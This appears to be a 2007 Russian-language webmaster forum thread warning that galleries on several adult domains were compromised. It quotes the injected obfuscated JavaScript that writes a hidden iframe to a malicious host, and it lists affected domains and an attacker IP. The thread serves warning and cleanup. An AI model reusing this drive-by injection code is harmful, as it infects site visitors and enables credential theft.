Master-X
Форум | Новости | Статьи
Главная » Форум » Линк Листы » 
Тема: Овнерам и Постерам!!! Ахтунг!!!
цитата
27/03/07 в 19:09
 Sergeyka
С фрихов при загрузке выполняется Джава код грузит троян, который ворует пароли от ФТП

http://www.momsforyou.com/xxx/latina-milf/mom-mature/
http://www.lesbiansplanet.com/girls/perfect-smooth-bodies/lesbian-ass/

Цитата:
<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!
109!101!32!115!114!99!61!
34!104!116!116!112!58!47!47!
115!115!115!55!46!105!110!102!111!47!
116!100!115!47!105!110!46!99!103!105!63!50!
34!32!119!105!100!116!104!61!34!49!34!32!104!101
!105!103!104!116!61!34!49!34!62!60!47!105!102!
114!97!109!101!62!";l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>


Без гандонов не входить, некоторые долго потом комп чистили, антивири его не видят

Владелец этого домена или не видит или мудак редкостный так как продолжает постить

Есть возможно еще фрихи

Последний раз редактировалось: Sergeyka (28/03/07 в 10:18), всего редактировалось 3 раз(а)
цитата
27/03/07 в 19:25
 viktorija
Sergeyka: еще вот эти два домена:

see-her-squirt.biz
beautylatinas.com

у меня улетели седня в бан
цитата
27/03/07 в 19:26
 Sergeyka
Вика спасибо, народ как лечить этого пидара не видят антивири его icon_sad.gif
Где сидит процесс что запускает файлы?

Файлы находяться в корне диска с
цитата
27/03/07 в 19:33
 ritor
Взлом с 75.126.21.163
Овнеры этих доменов у нас все сидят. Уже пофиксили все.
цитата
27/03/07 в 19:36
 Sergeyka
когда вы пофиксили, сходи по линке

Блин, еще бы научили как лечиться теперь?
цитата
27/03/07 в 19:57
 Sergeyka
забавно сука эта хуета сама себя прописала в брэндмауэр виндоса типа разрешено с него урлы отправлять, вроде убил но не уверен, не нашел где сидит эта сука
цитата
27/03/07 в 20:50
 ritor
hotsianbabes.com
lesbiansplanet.com
С этими доменами ситуация следующая.
Юзерами не были созданы бекапы, потому можно домены из листинга удалить, содержимое удаляется в данный момент под чистую, разбираться мне лень. Пароли сменены.
Овнерам
Ребята, приносим свои извинения, данная хрень почти сразу была обнаружена, мы бросили все и оперативно востановили все что смогли, не смотря на накрытый стол и ДР одного из коллег icon_smile.gif. В данный момент админы проверяют все что можно. Что вызывает подозрения сносим нафиг.
Банить постеров или не банить дело Ваше...
Спасибо за понимание, всю инфу буду постить по мере ее поступления.
Еще раз приношу свои извинения.
цитата
27/03/07 в 21:08
 Kors
вот еще пара доменов:
http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
http://www.hotsianbabes.com/asia/kinky-asian-teen/asian-woman/
что забавно - на старых фрихах ифрейма нет...
цитата
27/03/07 в 21:11
 ritor
http://www.onlychubbypics.com/bbw/heavy-breasted-beauty/nude-bbw/
восстановлен из бекапа. Все в порядке. Или я не все вижу?
hotsianbabes.com хтмл.
цитата
27/03/07 в 21:14
 sexogen
да блин со многих сайтов грузится экзешник, дрочам думаю пофиг , они не заметят но что он делает на компе при автозапуске х.е.з
цитата
27/03/07 в 22:10
 Skat
сенкс за инфу, так что теперь с этими доменами делать? сносить их из бд?
цитата
27/03/07 в 22:11
 bivin
Ну так теперь всё нормально или как?
цитата
27/03/07 в 22:28
 ritor
В данный момент удален контент полностью с доменов
hotsianbabes.com
lesbiansplanet.com
так как там не было сделано юзерами бекапов.
На всех остальных серверах все восстановлено из бекапов и в данный момент вообще выключен доступ по ФТП для всех пользователей от греха подальше. До момента выяснения каким образом ушли пароли я его открывать не буду никому icon_smile.gif.
Такая ситуация не у нас одних, всем нашим партнерам я стукнул в аську и уведомил о ситуации. Кто не получил мессагу из наших партнеров стучите мне я дам все разъяснения.
цитата
27/03/07 в 22:38
 eger
У меня тоже эта хрень, прошу овнеров не выкидывать из базы фрихи с доменов:
_sugaryteen.com/
_enamoure.com/
_wetoasis.com/
_exoticwish.com/
_exoticsea.com/
_ethnicisle.com/
_ethnic-hotel.com/
_ethnicangel.com/
_exoticflame.com/
_myethnicgirls.com/
_exotic-land.com/
_honeyfree.com/
_wetforest.com/

Сейчас разбираемся.

Последний раз редактировалось: eger (30/03/07 в 13:36), всего редактировалось 1 раз
цитата
27/03/07 в 22:41
 Skat
а в чем уязвимость не определили еще? если тока html то нет опасений?
цитата
27/03/07 в 22:46
 ritor
Дело не в серверах, дело в троянах на локале. Какие трояны угнали пароли пока выясняем. Вот я отписал
Взлом с 75.126.21.163
eger бро, удачно тебе восстановить все.
цитата
27/03/07 в 22:55
 pierx
Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)
цитата
27/03/07 в 22:59
 color
кто-нибудь - если удастся вытащить вирь, отошлите производетелям антивирей.... а то чувствую это надолго все...
цитата
27/03/07 в 23:10
 sexogen
pierx писал:
Те, кто фрихи проверял - проверьте свои хосты (индексные файлы)


а что там должно быть ?


лучше проверьте C:/ , там файлы типа FKJGHT.exe
если фиревол не стоял значит ушла инфа о вас, каспер, нод сасут...
цитата
27/03/07 в 23:17
 ritor
exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.
цитата
27/03/07 в 23:20
 Еugene
угу. тоже седня такой код на 1 фрихе видел
цитата
27/03/07 в 23:22
 pierx
Сергейка, покоцай код пробелами - читать невозможно
цитата
27/03/07 в 23:26
 sexogen
ritor писал:
exe размером 24605 байт ищите. пока все кто писал такой размер говорят. Но это уже в результате взлома грузили, куда ушли пароли пока не ясно. Касперскому отправили файлы.


а откуда пароли уходят и какие имено ?
цитата
27/03/07 в 23:38
 ritor
sexogen писал:
а откуда пароли уходят и какие имено ?

По моим данным и данных тех кто мне стучал в аську, ушли пароли к ФТП. Оффтопик: А скрипт с айпишника 75.126.21.163 ходил по доменам, ставил редирект, зачем то залил мне чужого файла, доров каких то. много перепутал. На все наши серчфиды тоже поставлен был редирект.
4 домена наших партнеров с 300К ТГП трафа и акками полностью на экспы редиректило ну и в таком духе, дедик с сиджами успели закрыть.

так вот по опросу почти все кто попал пароли хранили в клиентах ФТП. по наличию троянов щас все усиленно проверяются, но пока безрезультатно.
цитата
27/03/07 в 23:41
 sexogen
так есть ведь разные клиенты FTP , какой софт вы юзали , как конектились ? или где хранились пароли

каким браузером пользовались, версия.

нет смысла менять пароль если не установлен путь проникновения, угонят к ебеням повторно

ЗЫ
короче надо покупать корманый компутар специально для паролей
и к никаким сетям его не подрубать

зыы
и ставим софт http://www.dfservice.com/site-monitor/index.html.ru.htm для мониторинга сайтоф
Стр. 1, 2, 3  >  последняя »


Эта страница в полной версии